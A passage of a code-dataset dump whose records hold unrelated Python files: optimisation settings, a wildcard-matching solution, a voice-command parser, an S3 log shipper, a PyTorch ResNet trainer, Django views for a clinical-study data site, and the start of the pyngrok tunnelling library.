COMPLEX7, ROSENBROCK, ACKELY, XSQUARE, MOUNT2, GOLDSTEINPRICE, BOOTH, EASOM, BEALE],\r\n BOXFEATURECONSTRAINT: [SINX0, SINX0MOUNT2, SINX01MOUNT2, COMPLEX7, ROSENBROCK, ACKELY, XSQUARE, MOUNT2, GOLDSTEINPRICE, BOOTH, EASOM, BEALE], \r\n DISKCONSTRAINT: [SINX0, SINX0MOUNT2, SINX01MOUNT2, COMPLEX7, ROSENBROCK, ACKELY, XSQUARE, MOUNT2, GOLDSTEINPRICE, BOOTH, EASOM, BEALE],\r\n INEQUALITYCONSTRAINT: [SINX0, SINX0MOUNT2, SINX01MOUNT2, COMPLEX7, ROSENBROCK, ACKELY, RASTRIGIN, XSQUARE, MOUNT2, LOGX, LOGX2, GOLDSTEINPRICE, BOOTH, EASOM, BEALE]\r\n }\r\n\r\n\"\"\" 問題+特徴量数 オート設定モード\"\"\"\r\nbad_constr_problem_ufeature_for_opt = {NONCONSTRAINT: [], BOXCONSTRAINT: [], BOXFEATURECONSTRAINT: [1], DISKCONSTRAINT: [], INEQUALITYCONSTRAINT: []}\r\n\r\n\"\"\" データタイプ+特徴量数 オート設定モード\"\"\"\r\nbad_constr_data_feature_for_opt = {SINX0: [], SINX0MOUNT2: [], SINX01MOUNT2: [], COMPLEX7: list(range(1, 7)), ROSENBROCK: [1], GOLDSTEINPRICE: [1], BOOTH: [1], EASOM: [1], ACKELY: [1], BEALE: [1], XSQUARE: [], MOUNT2: [], RASTRIGIN: [], LOGX: [], LOGX2: []}\r\n\r\n\"\"\" データタイプ+特徴量数 オート設定モード\"\"\"\r\nappropriate_data_feature_for_opt = {SINX0: [2], SINX0MOUNT2: [2], SINX01MOUNT2: [2], COMPLEX7: [7], ROSENBROCK: [2], GOLDSTEINPRICE: [2], BOOTH: [2], EASOM: [2], BEALE: [2], ACKELY: [2], XSQUARE: [2], MOUNT2:[2]}\r\n\r\n\"\"\" 数理計画法の定式化\"\"\"\r\nformalization_ml_problem = {LINEARREGRESSION: LP, WEIGHTEDLINEARREGRESSION: LP, RANDOMFOREST: MIP, LIGHTGBM: MIP, SVRLINEAR: LP, SVRPOLY: NLP, SVRGAUSS: NLP,\r\n ANNLINEARREGRESSION: LP, KNNLINEARREGRESSION: LP, CGA2M: MIP, POLYNOMIALREGRESSION: NLP}\r\n\r\n\r\nif auto_n_nearest:\r\n n_nearest_list = [int(n_data_list[i] * n_nearest_best_rate) for i in range(len(n_data_list))]","repo_name":"tokyotech-nakatalab/ApproximateFrankWolfe","sub_path":"utility/setting.py","file_name":"setting.py","file_ext":"py","file_size_in_byte":11202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6571211395","text":"\"\"\"This is an accepted DP solution\"\"\"\nclass Solution(object):\n def isMatch(self, s, p):\n \"\"\"\n :type s: str\n :type p: str\n :rtype: bool\n \"\"\"\n def initDPMatrice(m, n):\n f = list()\n for i in xrange(m):\n f.append([False]*n)\n return f\n \n # This matrix entry f[i][j] tells the first\n # i chars of s can be matched to the first\n # j chars of p.\n f = initDPMatrice(len(s)+1, len(p)+1)\n f[0][0] = True;\n \n for i in xrange(len(s)+1):\n for j in xrange(len(p)+1):\n # we always have \"f[i][j] = f[i][j] or ...\"\n # because the value of f[i][j]\n # can be updated in multiple 'if' conditions\n \n # case 1: use the current '*' for p, and\n # still use it in the sub-comparison in f[i-1][j]\n if j > 0 and i > 0 and p[j-1] == '*':\n f[i][j] = f[i][j] or f[i-1][j]\n \n # case 2: don't use the current '*' for p\n if j > 0 and p[j-1] == '*':\n f[i][j] = f[i][j] or f[i][j-1]\n \n # case 3: consuming one char for both s and p\n if j > 0 and i > 0 and (p[j-1] == '*' or p[j-1] == '?' or s[i-1] == p[j-1]):\n f[i][j] = f[i][j] or f[i-1][j-1];\n return f[len(s)][len(p)];\n \n \n\n\n\n\"\"\"This recursive solution is time limit exceeded\n(because there are too many duplicate comparisons\nin the recursive functions),\nbut can give the general idea.\"\"\"\nclass Solution(object):\n def isMatch(self, s, p):\n \"\"\"\n :type s: str\n :type p: str\n :rtype: bool\n \"\"\"\n if len(s) + len(p) == 0:\n return True\n if len(s) * len(p) == 0:\n notEmpty = p if len(s)==0 else s\n for c in notEmpty:\n if c != '*':\n return False\n return True\n \n if p[0] == '*':\n return self.isMatch(s, p[1:]) or self.isMatch(s[1:], p[1:]) or self.isMatch(s[1:], p)\n elif p[0] == '?':\n return self.isMatch(s[1:], p[1:])\n else: # an ordinary char\n return s[0] == p[0] and self.isMatch(s[1:], p[1:])\n \n \n","repo_name":"patrick-luo/Leet-Code","sub_path":"044. Wildcard Matching.py","file_name":"044. Wildcard Matching.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22474033992","text":"from webhandler import*\nfrom GUI import GUI\n\n# parses the input test and determines a valid command\n\n\napp = [\"app\", \"application\", \"launch\",\"launches\",\"apps\",\"applications\"]\nsearch = [\"google\", \"bing\", \"search\", \"look up\",\"googles\"]\nurl = [\"open\", \"goto\", \"go to\", \"url\", \"website\", \"web\",\"opens\"]\nmouseMove = [\"move\", \"cursor\",\"moves\"]\nmouseScroll = [\"scroll\", \"up\", \"down\",\"scrolls\"]\nmouseClick = [\"click\", \"press\"]\nmouseDoubleClick = [\"doublepress\",\n \"doubleclick\", \"double\"]\nkeyboardType = [\"type\", \"input\"]\nkeyboardHold = [\"hold\"]\nkeyboardRelease = [\"release\", \"unhold\"]\n\nmusic = [\"play music\"]\n\n'''\nTypes:\napp\nsearch\nurl\nmouseMove\nmouseScroll\nmouseClick\nmouseDoubleClick\nkeyboardType\n\nkeyboardHold\nkeyboardRelease\n\n\n'''\n\n# returns [command type, parameters]\n\n\ndef GetCommand(text):\n a = []\n inputArray = text.strip().split()\n for x in range(len(inputArray) - 1):\n v = inputArray[x]\n\n if v in search:\n a = [\"search\", \" \".join(inputArray[x + 1:])]\n break\n elif v in url:\n a = [\"url\", \" \".join(inputArray[x + 1:])]\n break\n elif v in app:\n a = [\"app\", \" \".join(inputArray[x + 1:])]\n break\n elif v in mouseScroll:\n a = [\"mouseScroll\", inputArray[x + 1]]\n break\n elif v in mouseClick:\n a = [\"mouseClick\", \"\"]\n break\n elif v in mouseDoubleClick:\n a = [\"mouseDoubleClick\", \"\"]\n break\n elif v in mouseMove:\n a = [\"mouseMove\", \" \".join(inputArray[x + 1:])]\n elif v in keyboardType:\n a = [\"keyboardType\", \" \".join(inputArray[x + 1:])]\n break\n elif v in keyboardHold:\n a = [\"keyboardHold\", inputArray[x + 1]]\n break\n elif v in keyboardRelease:\n a = [\"keyboardRelease\", inputArray[x + 1]]\n break\n elif v + \" \" + inputArray[x + 1] in music:\n a = [\"music\", \"playpause\"]\n break\n\n if len(a) == 0 and len(inputArray) > 0:\n if inputArray[-1] in mouseClick:\n a = [\"mouseClick\", \"\"]\n elif inputArray[-1] in mouseDoubleClick:\n a = [\"mouseDoubleClick\", \"\"]\n\n if len(a) == 0:\n GUI.UpdateGuiSpeed(False)\n return a\n","repo_name":"TT1103/PyVoiceControl","sub_path":"PyVoiceControl/scripts/textparser.py","file_name":"textparser.py","file_ext":"py","file_size_in_byte":2290,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"10601417749","text":"\"\"\"\n1. Find all files not modified in last 2 days.\n2. For each file push to S3 and delete file.\n\nThe time limit will be configurable\nS3 bucket will be configurable\n\"\"\"\n\nimport os\n\nfrom datetime import datetime\n\nimport file_finder\nimport settings\nimport s3_uploader\nimport logger\n\nlogger = logger.get_logger()\n\ndef find_all_files(current_datetime):\n # get directories from settigs\n # get days cutoff from settings\n found_files_info=[]\n cutoff_days=settings.CONST_NUM_DAYS_CUTOFF\n for dir_path, dir_s3_key in settings.CONST_DIRECTORIES_TO_WATCH:\n for file_info in file_finder.find_files_in_dir(dir_path, cutoff_days, current_datetime):\n found_files_info.append((file_info, dir_s3_key))\n return found_files_info\n\ndef upload_to_s3(s3_uploader_obj, file_info, dir_s3_key, current_datetime):\n try:\n #eg. QA/tomcat/20-2-2020/logmanager.txt\n file_s3_upload_key=f\"{settings.S3_BUCKET_UPLOAD_DIR_ROOT}/{dir_s3_key}/{current_datetime.date()}/{file_info.name}\"\n if s3_uploader_obj.upload_file(\n file_info.path, settings.S3_BUCKET_NAME, file_s3_upload_key):\n logger.info(f\"[upload_to_s3]:[Uploaded][{file_info.path}][{settings.S3_BUCKET_NAME}][{file_s3_upload_key}]\")\n return True\n else:\n logger.info(f\"[upload_to_s3]:[Upload failed][{file_info.path}][{settings.S3_BUCKET_NAME}][{file_s3_upload_key}]\")\n except Exception as e:\n logger.exception(e)\n return False\n\ndef delete_file(file_info):\n #delete file here\n deleted=False\n try:\n os.remove(file_info.path)\n logger.info(f\"[delete_file]:[Deleted][{file_info.path}]\")\n except OSError as e:\n logger.exception(e)\n\nif __name__==\"__main__\":\n current_datetime=datetime.now()\n\n logger.info(f\"[started]\")\n\n found_files_info=find_all_files(current_datetime)\n logger.debug(f\"[found files][{found_files_info}]\")\n\n if settings.CONST_UPLOAD_TO_s3:\n s3_uploader_obj = s3_uploader.S3Uploader(\n settings.AWS_CONFIG['aws_access_key_id'],\n settings.AWS_CONFIG['aws_secret_access_key'],\n None\n )\n\n try:\n for file_info, dir_s3_key in found_files_info:\n can_delete=True\n if settings.CONST_UPLOAD_TO_s3:\n can_delete=upload_to_s3(s3_uploader_obj, file_info, dir_s3_key, current_datetime)\n if settings.CONST_DELETE_FILES:\n if can_delete: delete_file(file_info)\n except Exception as e:\n logger.exception(e)\n\n logger.info(f\"[ended]\")\n","repo_name":"mahoriR/log_ship_s3","sub_path":"log_ship.py","file_name":"log_ship.py","file_ext":"py","file_size_in_byte":2554,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"30207423575","text":"import os\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torchvision.transforms as transforms\nfrom torchvision import datasets\nfrom torch.utils.data import DataLoader, Dataset\nimport matplotlib.pyplot as plt\n\n# Device configuration\ndevice = torch.device(\"cuda\") if torch.cuda.is_available() else torch.device(\"cpu\")\nprint(f'Using {device} for inference')\n\n\n# show image\ndef image_show(image_s, labels_s):\n m = 1\n figure = plt.figure(figsize=(5, 5))\n for j in range(6):\n figure.add_subplot(3, 3, m)\n plt.axis(\"off\")\n img = image_s[j].squeeze()\n plt.imshow(np.transpose(img, (1, 2, 0)), cmap='gray')\n plt.title(classes[labels_s[j]])\n m += 1\n plt.show()\n\n\n# accuracy\ndef accuracy_check(data_image):\n model.eval()\n with torch.no_grad():\n correct = 0\n total = 0\n for images_1, labels_1 in data_image:\n images_1 = images_1.to(device)\n labels_1 = labels_1.to(device)\n outputs_1 = model(images_1)\n _, predicted = torch.max(outputs_1.data, 1)\n total += labels_1.size(0)\n correct += (predicted == labels_1).sum().item()\n acc = 100 * correct / total\n return acc\n\n\n# locc check\ndef loss_checker(img, lbl):\n running_loss = 0.0\n img, lbl = img.to(device), lbl.to(device)\n out = model(img)\n loss_1 = criterion(out, lbl)\n optimizer.zero_grad()\n loss_1.backward()\n optimizer.step()\n running_loss += loss_1.item()\n return running_loss\n\n\n# Hyper-parameters\naccuracy_train, accuracy_test, loss_train, loss_test = [], [], [], []\nbatch_size = 128\nlearning_rate = 0.001\n\n\n# Image preprocessing modules\ntransform = transforms.Compose([\n transforms.CenterCrop(150),\n transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))\n])\n\ntransform_p = transforms.Compose([\n transforms.CenterCrop(150),\n transforms.ToTensor(),\n])\n\n# real images dataset\ntrain_data = os.path.join('multi-class_data/seg_train')\ntest_data = os.path.join('multi-class_data/seg_test')\nimage_data = os.path.join('multi-class_data/test')\n\nclasses = ['buildings', 'forest', 'glacier', 'mountain', 'sea', 'street']\n\n\nclass CustomData(Dataset):\n def __init__(self, t_data, te_data, p_data, transform_s, transforms_p):\n self.train_data = t_data\n self.test_data = te_data\n self.predicted_data = p_data\n self.transform = transform_s\n self.transform_p = transforms_p\n\n def __getitem__(self, item):\n pass\n\n def data_getter(self):\n train_set = datasets.ImageFolder(self.train_data, self.transform)\n data = DataLoader(train_set, batch_size=128, shuffle=True)\n return data\n\n def test_data_getter(self):\n test_set = datasets.ImageFolder(self.test_data, self.transform)\n t_data = DataLoader(test_set, batch_size=128, shuffle=True)\n return t_data\n\n def prediction_data_getter(self):\n pred_set = datasets.ImageFolder(self.predicted_data, self.transform_p)\n p_data = DataLoader(pred_set, batch_size=10, shuffle=True)\n return p_data\n\n\ncds = CustomData(train_data, test_data, image_data, transform, transform_p)\nimage = cds.data_getter()\ntest_image = cds.test_data_getter()\nprediction_image = cds.prediction_data_getter()\n\n\n# 3x3 convolution\nprint('Preparing the Neural Network')\n\n\ndef conv3x3(in_channels, out_channels, stride=(1, 1)):\n return nn.Conv2d(in_channels, out_channels, (3, 3), stride=stride, padding=1, bias=False)\n\n\n# Residual block\nclass ResidualBlock(nn.Module):\n def __init__(self, in_channels, out_channels, stride=1, downsample=None):\n super(ResidualBlock, self).__init__()\n self.conv1 = conv3x3(in_channels, out_channels, stride)\n self.bn1 = nn.BatchNorm2d(out_channels)\n self.relu = nn.ReLU(inplace=True)\n self.conv2 = conv3x3(out_channels, out_channels)\n self.bn2 = nn.BatchNorm2d(out_channels)\n self.downsample = downsample\n\n def forward(self, x):\n residual = x\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n out = self.conv2(out)\n out = self.bn2(out)\n if self.downsample:\n residual = self.downsample(x)\n out += residual\n out = self.relu(out)\n return out\n\n\n# ResNet\nclass ResNet(nn.Module):\n def __init__(self, block, layers, num_classes=6):\n super(ResNet, self).__init__()\n self.in_channels = 16\n self.conv = conv3x3(3, 16)\n self.bn = nn.BatchNorm2d(16)\n self.relu = nn.ReLU(inplace=True)\n self.layer1 = self.make_layer(block, 16, layers[0])\n self.layer2 = self.make_layer(block, 32, layers[1], 2)\n self.layer3 = self.make_layer(block, 64, layers[2], 2)\n self.avg_pool = nn.AvgPool2d(8)\n self.fc = nn.Linear(1024, num_classes)\n\n def make_layer(self, block, out_channels, blocks, stride=1):\n layers = []\n downsample = None\n if (stride != 1) or (self.in_channels != out_channels):\n downsample = nn.Sequential(\n conv3x3(self.in_channels, out_channels, stride=stride),\n nn.BatchNorm2d(out_channels)\n )\n layers.append(block(self.in_channels, out_channels, stride, downsample))\n self.in_channels = out_channels\n for m in range(1, blocks):\n layers.append(block(out_channels, out_channels))\n return nn.Sequential(*layers)\n\n def forward(self, x):\n out = self.conv(x)\n out = self.bn(out)\n out = self.relu(out)\n out = self.layer1(out)\n out = self.layer2(out)\n out = self.layer3(out)\n out = self.avg_pool(out)\n out = out.view(out.size(0), -1)\n out = self.fc(out)\n return out\n\n\nmodel = ResNet(ResidualBlock, [2, 2, 2]).to(device)\n\n# Loss and optimizer\ncriterion = nn.CrossEntropyLoss()\noptimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)\n\n\n# For updating learning rate\ndef update_lr(optimizer1, lr):\n for param_group in optimizer1.param_groups:\n param_group['lr'] = lr\n\n\n# Train the model\ndef train(num_epochs):\n curr_lr = learning_rate\n for epoch in range(num_epochs):\n for i, (images, labels) in enumerate(image):\n # images = images.to(device)\n # labels = labels.to(device)\n #\n # # Forward pass\n # outputs = model(images)\n # loss = criterion(outputs, labels)\n #\n # # Backward and optimize\n # optimizer.zero_grad()\n # loss.backward()\n # optimizer.step()\n loss_train.append(loss_checker(images, labels))\n accuracy_train.append(accuracy_check(image))\n if (i + 1) % 100 == 0:\n print(f\"(train)Epoch [{epoch + 1}/{num_epochs}], Loss: {loss_checker(images, labels)}\")\n print(f'Accuracy of the model on the images: {accuracy_check(image)}')\n for m, (images1, labels1) in enumerate(test_image):\n\n loss_test.append(loss_checker(images1, labels1))\n accuracy_test.append(accuracy_check(test_image))\n if (m + 1) % 100 == 0:\n print(f\"(test)Epoch [{epoch + 1}/{num_epochs}], Loss: {loss_checker(images1, labels1)}\")\n print(f'Accuracy of the model on the test images: {accuracy_check(test_image)}')\n\n # Decay learning rate\n if (epoch + 1) % 20 == 0:\n curr_lr /= 3\n update_lr(optimizer, curr_lr)\n\n\nprint('Training')\ntrain(50)\nprint('Finished Training')\nprint('Saving')\ntorch.save(model.state_dict(), 'myResnet50.pth')\nprint('Saved')\n\nprint(loss_train, loss_test)\nplt.plot(loss_train, label='Training loss')\nplt.plot(loss_test, label='Test loss')\nplt.legend(frameon=False)\nplt.show()\n\nprint(accuracy_train, accuracy_test)\nplt.plot(accuracy_train, label='Train Accuracy')\nplt.plot(accuracy_test, label='Test Accuracy')\nplt.legend(frameon=False)\nplt.show()\n\n","repo_name":"Ikrom-coder/AI-classification-with-pytorch","sub_path":"resnet50.py","file_name":"resnet50.py","file_ext":"py","file_size_in_byte":7970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3189211479","text":"import os\r\nimport xml\r\n\r\nfrom django.contrib import messages\r\nfrom django.contrib.auth import authenticate, login, logout\r\nfrom django.contrib.auth.decorators import login_required\r\nfrom django.contrib.auth.forms import AuthenticationForm\r\nfrom django.http import HttpResponse\r\nfrom django.shortcuts import render, redirect\r\nimport xml.etree.ElementTree as ET\r\nfrom django.shortcuts import render\r\n\r\nfrom .settings import BASE_DIR\r\nfrom .decorators import unauthenticated_user, allowed_users\r\nfrom .forms import Display_Form\r\nfrom .models import Display_File, Request_File\r\n\r\nFILE_TYPES = ['txt', 'xml']\r\n\r\n\r\n@login_required\r\ndef upload(request):\r\n form = Display_Form()\r\n if request.method == 'POST':\r\n form = Display_Form(request.POST, request.FILES)\r\n if form.is_valid():\r\n user_pr = form.save(commit=False)\r\n user_pr.display_file = request.FILES['display_file']\r\n file_type = user_pr.display_file.url.split('.')[-1]\r\n file_type = file_type.lower()\r\n if file_type not in FILE_TYPES:\r\n return render(request, 'profile_maker/error.html')\r\n user_pr.save()\r\n return render(request, 'profile_maker/details.html', {'user_pr': user_pr})\r\n context = {\"form\": form}\r\n return render(request, 'profile_maker/create.html', context)\r\n\r\n\r\ndef index(request):\r\n # return render(request, \"index.html\", {})\r\n return render(request, \"registration/login.html\", {})\r\n\r\n\r\n@login_required\r\n@allowed_users(allowed_roles=['admin', 'patient', 'researcher'])\r\ndef homepage(request):\r\n tree = ET.parse(\"blockchain/static/dataset/SearchResults.xml\")\r\n\r\n all_studies = []\r\n\r\n for search_results_xml in tree.iter(\"search_results\"):\r\n for study_xml in search_results_xml.iter(\"study\"):\r\n study_json = {}\r\n study_json[\"id\"] = study_xml.find(\"url\").text.replace(\"https://ClinicalTrials.gov/show/\", \"\")\r\n\r\n for data in study_xml:\r\n if not data.text:\r\n study_json[data.tag] = data.text\r\n else:\r\n study_json[data.tag] = data.text.strip()\r\n\r\n all_studies.append(study_json)\r\n return render(request=request, template_name=\"homepage.html\", context={'all_studies': all_studies})\r\n\r\n\r\n\r\n@login_required\r\n@allowed_users(allowed_roles=['admin', 'patient', 'researcher'])\r\ndef study(request):\r\n id = request.GET['id']\r\n tree = ET.parse(\"blockchain/static/dataset/\" + id + \".xml\")\r\n content = tree.tostring()\r\n return render(request=request, template_name=\"study.html\", context={\"content\": content})\r\n\r\n\r\n@login_required(login_url='login')\r\ndef study(request, id):\r\n tree = ET.parse(\"blockchain/static/dataset/search_result/\" + id + \".xml\")\r\n content = tree.find(\"brief_summary\").find(\"textblock\").text\r\n\r\n return render(request=request, template_name=\"study.html\", context={'content': content})\r\n\r\n\r\n@login_required\r\n@allowed_users(allowed_roles=['admin', 'patient', 'researcher'])\r\ndef data_center(request):\r\n current_email = request.user.email\r\n print(current_email)\r\n user_studies_queryset = Display_File.objects.all()\r\n\r\n all_studies = []\r\n\r\n for user_study in user_studies_queryset:\r\n\r\n study_json = {}\r\n study_xml_filename = '/uploadedstudydetails/' + user_study.display_file.name\r\n\r\n study_json[\"file_name\"] = user_study.file_name\r\n study_json[\"display_file\"] = user_study.display_file\r\n study_json[\"email\"] = user_study.email\r\n study_json[\"display_file_path\"] = study_xml_filename\r\n\r\n study_json[\"is_link\"] = (user_study.email == current_email)\r\n\r\n all_studies.append(study_json)\r\n\r\n return render(request, \"data_center.html\", {'all_studies': all_studies})\r\n\r\n\r\n@login_required\r\ndef uploaded_study_detail(request, study_id):\r\n # print(study_id)\r\n file_path = os.path.join(BASE_DIR, 'blockchain\\\\media\\\\' + study_id)\r\n study_details = open(file_path).read()\r\n return render(request, \"uploadedstudydetails.html\", {'uploaded_study_details': study_details})\r\n\r\n\r\ndef study_detail(request, study_id):\r\n print(study_id)\r\n\r\n if study_id.endswith('.xml'):\r\n # process the xml file\r\n whatever = 123\r\n\r\n file_path = os.path.join(BASE_DIR, 'blockchain\\\\studies\\\\' + study_id)\r\n study_details = open(file_path).read()\r\n return render(request, \"studydetails.html\", {'study_details': study_details})\r\n\r\n\r\n@login_required\r\ndef requests(request):\r\n user_requests_queryset = Request_File.objects.all()\r\n\r\n all_requests = []\r\n\r\n for user_requests in user_requests_queryset:\r\n requests_json = {}\r\n\r\n requests_json[\"file_name\"] = user_requests.file_name\r\n requests_json[\"status\"] = user_requests.status\r\n requests_json[\"email\"] = user_requests.email\r\n\r\n all_requests.append(requests_json)\r\n return render(request, \"requests.html\")\r\n\r\n","repo_name":"BlueJayADAL/SCARP2020-Blockchain","sub_path":"website/blockchain/blockchain/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":4919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35385880660","text":"import json\nimport logging\nimport os\nimport socket\nimport sys\nimport uuid\nfrom http import HTTPStatus\nfrom typing import Optional, Any, Dict, List, Tuple\nfrom urllib.error import HTTPError, URLError\nfrom urllib.parse import urlencode\nfrom urllib.request import urlopen, Request\n\nfrom pyngrok import process, conf, installer\nfrom pyngrok.conf import PyngrokConfig\nfrom pyngrok.exception import PyngrokNgrokHTTPError, PyngrokNgrokURLError, PyngrokSecurityError, PyngrokError\nfrom pyngrok.installer import get_default_config\nfrom pyngrok.process import NgrokProcess\n\n__author__ = \"Alex Laird\"\n__copyright__ = \"Copyright 2023, Alex Laird\"\n__version__ = \"7.0.0\"\n\nlogger = logging.getLogger(__name__)\n\n\nclass NgrokTunnel:\n \"\"\"\n An object containing information about a ``ngrok`` tunnel.\n \"\"\"\n\n def __init__(self,\n data: Dict[str, Any],\n pyngrok_config: PyngrokConfig,\n api_url: Optional[str]) -> None:\n #: The original tunnel data.\n self.data: Dict[str, Any] = data\n #: The ``pyngrok`` configuration to use when interacting with the ``ngrok``.\n self.pyngrok_config: PyngrokConfig = pyngrok_config\n #: The API URL for the ``ngrok`` web interface.\n self.api_url: Optional[str] = api_url\n\n #: The ID of the tunnel.\n self.id: Optional[str] = data.get(\"ID\", None)\n #: The name of the tunnel.\n self.name: Optional[str] = data.get(\"name\")\n #: The protocol of the tunnel.\n self.proto: Optional[str] = data.get(\"proto\")\n #: The tunnel URI, a relative path that can be used to make requests to the ``ngrok`` web interface.\n self.uri: Optional[str] = data.get(\"uri\")\n #: The public ``ngrok`` URL.\n self.public_url: Optional[str] = data.get(\"public_url\")\n #: The config for the tunnel.\n self.config: Dict[str, Any] = data.get(\"config\", {})\n #: Metrics for `the tunnel `_.\n self.metrics: Dict[str, Any] = data.get(\"metrics\", {})\n\n def __repr__(self) -> str:\n return \" \\\"{}\\\">\".format(self.public_url, self.config[\"addr\"]) if self.config.get(\n \"addr\", None) else \"\"\n\n def __str__(self) -> str: # pragma: no cover\n return \"NgrokTunnel: \\\"{}\\\" -> \\\"{}\\\"\".format(self.public_url, self.config[\"addr\"]) if self.config.get(\n \"addr\", None) else \"\"\n\n def refresh_metrics(self) -> None:\n \"\"\"\n Get the latest metrics for the tunnel and update the ``metrics`` variable.\n \"\"\"\n logger.info(\"Refreshing metrics for tunnel: {}\".format(self.public_url))\n\n data = api_request(\"{}{}\".format(self.api_url, self.uri), method=\"GET\",\n timeout=self.pyngrok_config.request_timeout)\n\n if \"metrics\" not in data:\n raise PyngrokError(\"The ngrok API did not return \\\"metrics\\\" in the response\")\n\n self.data[\"metrics\"] = data[\"metrics\"]\n self.metrics = self.data[\"metrics\"]\n\n\n_current_tunnels: Dict[str, NgrokTunnel] = {}\n\n\ndef install_ngrok(pyngrok_config: Optional[PyngrokConfig] = None) -> None:\n \"\"\"\n Download, install, and initialize ``ngrok`` for the given config. If ``ngrok`` and its default\n config is already installed, calling this method will do nothing.\n\n :param pyngrok_config: A ``pyngrok`` configuration to use when interacting with the ``ngrok`` binary,\n overriding :func:`~pyngrok.conf.get_default()`.\n \"\"\"\n if pyngrok_config is None:\n pyngrok_config = conf.get_default()\n\n if not os.path.exists(pyngrok_config.ngrok_path):\n installer.install_ngrok(pyngrok_config.ngrok_path, ngrok_version=pyngrok_config.ngrok_version)\n\n config_path = conf.get_config_path(pyngrok_config)\n\n # Install the config to the requested path\n if not os.path.exists(config_path):\n installer.install_default_config(config_path, ngrok_version=pyngrok_config.ngrok_version)\n\n # Install the default config, even if we don't need it this time, if it doesn't already exist\n if conf.DEFAULT_NGROK_CONFIG_PATH != config_path and \\\n not os.path.exists(conf.DEFAULT_NGROK_CONFIG_PATH):\n installer.install_default_config(conf.DEFAULT_NGROK_CONFIG_PATH, ngrok_version=pyngrok_config.ngrok_version)\n\n\ndef set_auth_token(token: str,\n pyngrok_config: Optional[PyngrokConfig] = None) -> None:\n \"\"\"\n Set the ``ngrok`` auth token in the config file, enabling authenticated features (for instance,\n more concurrent tunnels, custom subdomains, etc.).\n\n If ``ngrok`` is not installed at :class:`~pyngrok.conf.PyngrokConfig`'s ``ngrok_path``, calling this method\n will first download and install ``ngrok``.\n\n :param token: The auth token to set.\n :param pyngrok_config: A ``pyngrok`` configuration to use when interacting with the ``ngrok`` binary,\n overriding :func:`~pyngrok.conf.get_default()`.\n \"\"\"\n if pyngrok_config is None:\n pyngrok_config = conf.get_default()\n\n install_ngrok(pyngrok_config)\n\n process.set_auth_token(pyngrok_config, token)\n\n\ndef get_ngrok_process(pyngrok_config: Optional[PyngrokConfig] = None) -> NgrokProcess:\n \"\"\"\n Get the current ``ngrok`` process for the given config's ``ngrok_path``.\n\n If ``ngrok`` is not installed at :class:`~pyngrok.conf.PyngrokConfig`'s ``ngrok_path``, calling this method\n will first download and install ``ngrok``.\n\n If ``ngrok`` is not running, calling this method will first start a process with\n :class:`~pyngrok.conf.PyngrokConfig`.\n\n Use :func:`~pyngrok.process.is_process_running` to check if a process is running without also implicitly\n installing and starting it.\n\n :param pyngrok_config: A ``pyngrok`` configuration to use when interacting with the ``ngrok`` binary,\n overriding :func:`~pyngrok.conf.get_default()`.\n :return: The ``ngrok`` process.\n \"\"\"\n if pyngrok_config is None:\n pyngrok_config = conf.get_default()\n\n install_ngrok(pyngrok_config)\n\n return process.get_process(pyngrok_config)\n\n\ndef _apply_cloud_edge_to_tunnel(tunnel: NgrokTunnel,\n pyngrok_config: PyngrokConfig) -> None:\n if not tunnel.public_url and pyngrok_config.api_key and tunnel.id:\n tunnel_response = api_request(\"https://api.ngrok.com/tunnels/{}\".format(tunnel.id), method=\"GET\",\n auth=pyngrok_config.api_key)\n if \"labels\" not in tunnel_response or \"edge\" not in tunnel_response[\"labels\"]:\n raise PyngrokError(\n \"Tunnel {} does not have \\\"labels\\\", use a Tunnel configured on Cloud Edge.\".format(tunnel.data[\"ID\"]))\n\n edge = tunnel_response[\"labels\"][\"edge\"]\n if edge.startswith(\"edghts_\"):\n edges_prefix = \"https\"\n elif edge.startswith(\"edgtcp\"):\n edges_prefix = \"tcp\"\n elif edge.startswith(\"edgtls\"):\n edges_prefix = \"tls\"\n else:\n raise PyngrokError(\"Unknown Edge prefix: {}.\".format(edge))\n\n edge_response = api_request(\"https://api.ngrok.com/edges/{}/{}\".format(edges_prefix, edge), method=\"GET\",\n auth=pyngrok_config.api_key)\n\n if \"hostports\" not in edge_response or len(edge_response[\"hostports\"]) < 1:\n raise PyngrokError(\n \"No Endpoint is attached to your Cloud Edge {}, login to the ngrok dashboard to attach an Endpoint to your Edge first.\".format(\n edge))\n\n tunnel.public_url = \"{}://{}\".format(edges_prefix, edge_response[\"hostports\"][0])\n tunnel.proto = edges_prefix\n\n\n# When Python <3.9 support is dropped, addr type can be changed to Optional[str|int]\ndef connect(addr: Optional[str] = None,\n proto: Optional[str] = None,\n name: Optional[str] = None,\n pyngrok_config: Optional[PyngrokConfig] = None,\n **options: Any) -> NgrokTunnel:\n \"\"\"\n Establish a new ``ngrok`` tunnel for the given protocol to the given port, returning an object representing\n the connected tunnel.\n\n If a `tunnel definition in ngrok's config file\n `_ matches the given\n ``name``, it will be loaded and used to start the tunnel. When ``name`` is ``None`` and a \"pyngrok-default\" tunnel\n definition exists in ``ngrok``'s config, it will be loaded and use. Any ``kwargs`` passed as ``options`` will\n override properties from the loaded tunnel definition.\n\n If ``ngrok`` is not installed at :class:`~pyngrok.conf.PyngrokConfig`'s ``ngrok_path``, calling this method\n will first download and install ``ngrok``.\n\n ``pyngrok`` is compatible with ``ngrok`` v2 and v3, but by default it will install v3. To install v2 instead,\n set ``ngrok_version`` to \"v2\" in :class:`~pyngrok.conf.PyngrokConfig`:\n\n If ``ngrok`` is not running, calling this method will first start a process with\n :class:`~pyngrok.conf.PyngrokConfig`.\n\n .. note::\n\n ``ngrok`` v2's default behavior for ``http`` when no additional properties are passed is to open *two* tunnels,\n one 